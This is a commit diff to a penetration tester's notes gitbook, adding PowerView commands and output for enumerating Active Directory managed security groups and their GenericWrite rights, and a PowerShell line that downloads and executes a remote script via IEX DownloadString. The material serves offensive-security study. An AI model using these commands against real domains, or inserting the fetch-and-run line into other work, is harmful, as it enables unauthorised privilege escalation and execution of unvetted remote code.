[AHK] Automatic update 👽

README.md

@@ -4,6 +4,8 @@ Hey there!
 
 I'm [snovvcrash](https://snovvcrash.rocks/about) and that's a gitbook for keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online is the most convenient way to access it. So, if you find it handy too, feel free to use it... **responsibly**, of course!
 
+In the course of taking these notes, my main rule is that all the given commands were actually tested either during a real engagement or in a training lab.
+
 {% hint style="info" %}
 The previous version of PPN is 👉🏻 [here](https://snovvcrash.rocks/PPN/) (deprecated).
 {% endhint %}

dev/python.md

@@ -24,18 +24,6 @@ $ pip freeze --local [-r requirements.txt] > requirements.txt
 $ python3 -m flake8 --ignore=W191,E501,E722 somefile.py
 ```
 
-{% code title="SublimeLinter.sublime-settings" %}
-```json
-{
-	"linters": {
-		"flake8": {
-			"args": ["--ignore=W191,E501,E722"]
-		}
-	}
-}
-```
-{% endcode %}
-
 
 
 ### pylint
@@ -44,19 +32,6 @@ $ python3 -m flake8 --ignore=W191,E501,E722 somefile.py
 $ python3 -m pylint --disable=W0311,C0301,R0912,R0915,C0103,C0114,R0903 --msg-template='{msg_id}:{line:3d},{column:2d}:{obj}:{msg}' somefile.py
 ```
 
-{% code title="SublimeLinter.sublime-settings" %}
-```json
-{
-	"linters": {
-		"pylint": {
-			"disable": true,
-			"args": ["--disable=W0311,C0301,R0912,R0915,C0103,C0114,R0903"]
-		}
-	}
-}
-```
-{% endcode %}
-
 
 
 

pentest/internal/ad/acl-abuse.md

@@ -152,3 +152,46 @@ PS > $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $ident
 PS > $acl.AddAccessRule($ace)
 PS > Set-Acl -AclObject $acl "AD:DC=megacorp,DC=local"
 ```
+
+
+
+
+## Managed Security Groups
+
+* [https://stealthbits.com/blog/exploiting-weak-active-directory-permissions-with-powersploit/](https://stealthbits.com/blog/exploiting-weak-active-directory-permissions-with-powersploit/)
+
+Returns all security groups in the current (or target) domain that have a manager set:
+
+```
+PowerView3 > Get-DomainManagedSecurityGroup | select groupName
+
+GroupName                : Security Operations
+GroupDistinguishedName   : CN=Security Operations,CN=Users,DC=MEGACORP,DC=LOCAL
+ManagerName              : john.doe
+ManagerDistinguishedName : CN=John Doe,OU=Security,OU=IT,OU=Employees,DC=MEGACORP,DC=LOCAL
+ManagerType              : User
+ManagerCanWrite          : UNKNOWN
+```
+
+Enumerate the ACLs set on this group. `GenericWrite` privilege means that the user can modify group membership:
+
+```
+PowerView3 > $sid = ConvertTo-SID john.doe
+PowerView3 > Get-DomainObjectAcl -Identity 'Security Operations' | ? {$_.SecurityIdentifier -eq $sid}
+
+ObjectDN              : CN=Security Operations,CN=Users,DC=MEGACORP,DC=LOCAL
+ObjectSID             : S-1-5-21-3167813660-1240564177-918740779-2549
+ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
+BinaryLength          : 36
+AceQualifier          : AccessAllowed
+IsCallback            : False
+OpaqueLength          : 0
+AccessMask            : 131132
+SecurityIdentifier    : S-1-5-21-3167813660-1240564177-918740779-1874
+AceType               : AccessAllowed
+AceFlags              : ContainerInherit
+IsInherited           : False
+InheritanceFlags      : ContainerInherit
+PropagationFlags      : None
+AuditFlags            : None
+```

pentest/internal/ad/gpo-buse.md

@@ -79,6 +79,9 @@ Identify the OU containing the VICTIM-PC object:
 ```
 PS > Add-WindowsFeature -Name "RSAT-AD-PowerShell"
 PS > Import-Module ActiveDirectory
+Or
+PS > IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/ADModuleImport.ps1")
+
 PS > Get-ADComputer -Identity VICTIM-PC | select DistinguishedName
 ```